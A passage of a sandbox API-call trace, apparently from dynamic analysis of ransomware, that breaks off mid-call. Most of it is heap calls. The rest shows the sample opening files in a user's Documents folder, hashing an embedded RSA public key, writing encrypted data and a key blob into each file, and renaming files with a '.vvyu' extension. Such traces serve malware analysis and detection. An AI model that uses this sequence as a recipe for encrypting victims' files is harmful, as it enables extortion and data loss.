(HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2de0 [0196.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d80 [0196.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0196.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d98 [0196.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d68 [0196.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2df8 [0196.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0196.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2dc8 [0196.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2db0 [0196.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e10 [0196.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0196.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2db0 [0196.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0196.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0196.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0196.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d80 [0196.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0196.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0196.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0196.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0196.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0196.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0196.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0196.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0196.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0196.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0196.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1530 | out: hHeap=0x620000) returned 1 [0196.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.017] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x7be1, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x7be1, lpOverlapped=0x0) returned 1 [0196.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.018] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x7be6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.018] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.020] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.020] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.020] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.020] CloseHandle (hObject=0x568) returned 1 [0196.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0196.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0196.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0196.025] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\6a8RDH85d8whH-HX.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\6a8rdh85d8whh-hx.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\6a8RDH85d8whH-HX.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\6a8rdh85d8whh-hx.pptx.vvyu")) returned 1 [0196.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.027] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0196.030] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89ca4940, ftCreationTime.dwHighDateTime=0x1d89f08, ftLastAccessTime.dwLowDateTime=0x8cf56720, ftLastAccessTime.dwHighDateTime=0x1d8a40e, ftLastWriteTime.dwLowDateTime=0x8cf56720, ftLastWriteTime.dwHighDateTime=0x1d8a40e, nFileSizeHigh=0x0, nFileSizeLow=0x8116, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="84p7mNA.doc", cAlternateFileName="")) returned 1 [0196.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0196.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.030] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\84p7mNA.doc") returned=".doc" [0196.030] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\84p7mNA.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\84p7mna.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.036] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=33046) returned 1 [0196.037] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.039] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x80f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.039] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.042] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.042] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x8116, lpOverlapped=0x0) returned 1 [0196.043] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.043] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.043] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.043] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0196.045] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.045] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.045] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.045] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.045] GetLastError () returned 0x0 [0196.045] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.045] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0196.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.046] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.046] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.046] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8120) returned 0x2ea79b0 [0196.046] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1530 [0196.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d50 [0196.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1578 [0196.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d68 [0196.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d98 [0196.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2df8 [0196.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2db0 [0196.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.047] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0196.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0196.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0196.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2df8 [0196.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0196.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2db0 [0196.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2d98 [0196.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0196.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0196.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0196.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0196.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0196.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0196.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0196.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.050] GetCurrentThreadId () returned 0x66c [0196.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea4de0 [0196.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.051] RtlAllocateHeap (HeapHandle=0x620000, 